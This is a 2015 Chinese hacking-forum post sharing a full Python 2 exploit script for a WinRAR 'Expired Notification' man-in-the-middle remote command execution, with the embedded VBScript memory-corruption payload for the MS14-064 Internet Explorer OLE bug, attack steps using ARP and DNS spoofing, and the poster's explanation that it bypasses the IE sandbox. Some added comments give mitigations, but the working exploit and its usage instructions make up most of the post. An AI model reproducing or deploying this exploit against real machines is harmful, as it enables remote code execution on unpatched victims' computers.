
继SFX漏洞之后又一枚“漏洞”

发表于 2015-10-17 22:03:38 | 显示全部楼层 |阅读模式
exp:
    #!/usr/bin/python -w
    # Title : WinRar Expired Notification - OLE Remote Command Execution
    # Date : 30/09/2015
    # Author : R-73eN
    # Tested on : Windows Xp SP3 with WinRAR 5.21
    # This exploits a vulnerability in the implementation of showing ads.
    # When a user opens any WINRAR file sometimes
    # A window with Expired Notification title loads http://www.win-rar.com/notifier/
    # reminding user to buy winrar to remove ads.
    # Since this uses a http connection we can use Man In The Middle attack
    # to gain Remote Code Execution
    #
    # Triggering the vulnerability
    # 1) Run this python script.
    # 2) arpspoof the target
    # 3) dnsspoof www.win-rar.com to point to your IP
    # 4) Wait for the victim to open WinRar files.
    #
    # Video :  https://youtu.be/h976wFlHGw4
    #
    # i hope this time the "great security researcher" Mohammad Reza Espargham
    # me[at]reza[dot]es , reza.espargham[at]gmail[dot]com doesnt steals again my exploit .....
    #
    # http://0day.today/exploit/description/24292 My exploit publishied in 25/09/2015
    # http://0day.today/exploit/description/24296 same exploit written in perl publishied in 26/09/2015
    #
    #
    #
    # --- Review notes (defensive reading of this listing) ---
    # Python 2 syntax throughout: bare `print` statements and raw_input() below,
    # so it does not run unmodified under Python 3.
    # Root cause as stated in the header: the notifier page is fetched over
    # cleartext HTTP, which lets an on-path party substitute its content.
    # Fetching that page only over TLS with certificate validation removes the
    # substitution step entirely; the forum notes under the listing also state
    # that the embedded VBScript depends on the MS14-064 update being absent,
    # so a patched host is a second, independent mitigation.
    # The HTML payload is a runtime string literal and is left byte-identical.
      
    # ASCII-art banner printed at startup (cosmetic only).
    banner = ""
    banner +="  ___        __        ____                 _    _  \n"
    banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
    banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
    banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
    banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
    print banner
    print " [+] WinRar (Free Version) - Remote Command Execution [+]\n"
    import socket
      
    CRLF = "\r\n"
    #OLE command execution
    # HTML served to the client. The first VBScript block (runmumaa) is the only
    # place a process is started: Shell.Application.ShellExecute on "calc.exe",
    # a visible proof of execution. The second, longer VBScript block only sets
    # up the conditions under which runmumaa() is eventually called; the page's
    # own notes attribute that part to MS14-064.
    exploit = """<html>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
    <head>
    </head>
    <body>
       
    <SCRIPT LANGUAGE="VBScript">
      
    function runmumaa()
    On Error Resume Next
    set shell=createobject("Shell.Application")
    shell.ShellExecute "calc.exe", "runas", 0
    end function
    </script>
       
    <SCRIPT LANGUAGE="VBScript">
       
    dim   aa()
    dim   ab()
    dim   a0
    dim   a1
    dim   a2
    dim   a3
    dim   win9x
    dim   intVersion
    dim   rnda
    dim   funclass
    dim   myarray
       
    Begin()
       
    function Begin()
      On Error Resume Next
      info=Navigator.UserAgent
       
      if(instr(info,"Win64")>0)   then
         exit   function
      end if
       
      if (instr(info,"MSIE")>0)   then
                 intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
      else
         exit   function  
                   
      end if
       
      win9x=0
       
      BeginInit()
      If Create()=True Then
         myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
         myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
       
         if(intVersion<4) then
             document.write("<br> IE")
             document.write(intVersion)
             runshellcode()                    
         else  
              setnotsafemode()
         end if
      end if
    end function
       
    function BeginInit()
       Randomize()
       redim aa(5)
       redim ab(5)
       a0=13+17*rnd(6)
       a3=7+3*rnd(5)
    end function
       
    function Create()
      On Error Resume Next
      dim i
      Create=False
      For i = 0 To 400
        If Over()=True Then
           Create=True
           Exit For
        End If
      Next
    end function
       
    sub testaa()
    end sub
       
    function mydata()
        On Error Resume Next
         i=testaa
         i=null
         redim  Preserve aa(a2)  
         
         ab(0)=0
         aa(a1)=i
         ab(0)=6.36598737437801E-314
       
         aa(a1+2)=myarray
         ab(2)=1.74088534731324E-310  
         mydata=aa(a1)
         redim  Preserve aa(a0)  
    end function
       
       
    function setnotsafemode()
        On Error Resume Next
        i=mydata()  
        i=rum(i+8)
        i=rum(i+16)
        j=rum(i+&h134)  
        for k=0 to &h60 step 4
            j=rum(i+&h120+k)
            if(j=14) then
                  j=0         
                  redim  Preserve aa(a2)            
         aa(a1+2)(i+&h11c+k)=ab(4)
                  redim  Preserve aa(a0)  
       
         j=0
                  j=rum(i+&h120+k)   
                
                   Exit for
               end if
       
        next
        ab(2)=1.69759663316747E-313
        runmumaa()
    end function
       
    function Over()
        On Error Resume Next
        dim type1,type2,type3
        Over=False
        a0=a0+a3
        a1=a0+2
        a2=a0+&h8000000
         
        redim  Preserve aa(a0)
        redim   ab(a0)     
         
        redim  Preserve aa(a2)
         
        type1=1
        ab(0)=1.123456789012345678901234567890
        aa(a0)=10
                
        If(IsObject(aa(a1-1)) = False) Then
           if(intVersion<4) then
               mem=cint(a0+1)*16            
               j=vartype(aa(a1-1))
               if((j=mem+4) or (j*8=mem+8)) then
                  if(vartype(aa(a1-1))<>0)  Then   
                     If(IsObject(aa(a1)) = False ) Then            
                       type1=VarType(aa(a1))
                     end if               
                  end if
               else
                 redim  Preserve aa(a0)
                 exit  function
       
               end if
            else
               if(vartype(aa(a1-1))<>0)  Then   
                  If(IsObject(aa(a1)) = False ) Then
                      type1=VarType(aa(a1))
                  end if               
                end if
            end if
        end if
                     
          
        If(type1=&h2f66) Then         
              Over=True      
        End If  
        If(type1=&hB9AD) Then
              Over=True
              win9x=1
        End If  
       
        redim  Preserve aa(a0)         
               
    end function
       
    function rum(add)
        On Error Resume Next
        redim  Preserve aa(a2)  
         
        ab(0)=0   
        aa(a1)=add+4     
        ab(0)=1.69759663316747E-313      
        rum=lenb(aa(a1))  
          
        ab(0)=0
        redim  Preserve aa(a0)
    end function
       
    </script>
       
    </body>
    </html>"""
      
    # Full HTTP/1.1 response (status line, headers, body). NOTE: this value is
    # built but never referenced again -- the loop below sends `exploit` (the
    # bare HTML, no headers) instead. Left as-is; documented only.
    response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF
    # Plain TCP listener on the operator-supplied local address, fixed port 8080.
    # Neither the socket nor the accepted connection is ever closed explicitly;
    # they are reclaimed when exit(0) ends the process.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    host = raw_input(" Enter Local IP: ")
    server_address = (host, 8080)
    sock.bind(server_address)
    print "\n[+] Server started " + host +  " [+]"
    sock.listen(1)
    print "\n[+] Waiting for request . . . [+]"
    print "\n[+] Arpspoof target , and make win-rar.com to point to your IP [+]"
    # accept() is called exactly once, before the loop: only the first client is served.
    connection, client_address = sock.accept()
    while True:
        # Up to 2048 bytes of the request are read and discarded (no parsing);
        # a short or partial request is not handled specially.
        connection.recv(2048)
        print "[+] Got request , sending exploit . . .[+]"
        # Raw HTML only (see `response` above). send() may transmit fewer bytes
        # than len(exploit); the return value is not checked.
        connection.send(exploit)
        print "[+] Exploit sent , A calc should pop up . .  [+]"
        print "\nhttps://www.infogen.al/\n"
        # Terminates after the first request, so the while loop never repeats.
        exit(0)

            #  0day.today [2015-10-15]  #


保存为python脚本
arpspoof目标主机
再dns欺骗目标主机
目标主机打开winrar即可触发
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓继续↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
可能有些朋友已经注意到了,里面用到了2014年的一个漏洞
ms14-064漏洞
所以它的触发条件是:
1:在局域网可劫持环境
2:没打ms14-064补丁
-------------------------------------------------------------------------
当然,为什么要这样做?这其实涉及到一个沙箱机制:
而这样做恰恰绕过了这个沙箱,导致一打开就直接触发。
当然,当出现类似的IE漏洞时,同样可以利用这种方式来绕过沙箱。

原帖地址:http://www.sadboy.org/forum.php?mod=viewthread&tid=418&extra=

发表于 2015-10-18 08:43:59 | 显示全部楼层
支持,看起来不错呢!

发表于 2015-10-19 20:45:15 | 显示全部楼层
支持中国红客联盟(ihonker.org)

发表于 2015-10-20 00:14:18 | 显示全部楼层
感谢楼主的分享~

发表于 2015-10-24 08:23:01 | 显示全部楼层
支持,看起来不错呢!

发表于 2015-10-26 11:12:34 | 显示全部楼层

发表于 2015-10-27 19:55:17 | 显示全部楼层
感谢楼主的分享~

发表于 2015-10-27 21:48:56 | 显示全部楼层

发表于 2015-10-28 00:23:01 | 显示全部楼层

发表于 2015-10-28 04:54:21 | 显示全部楼层
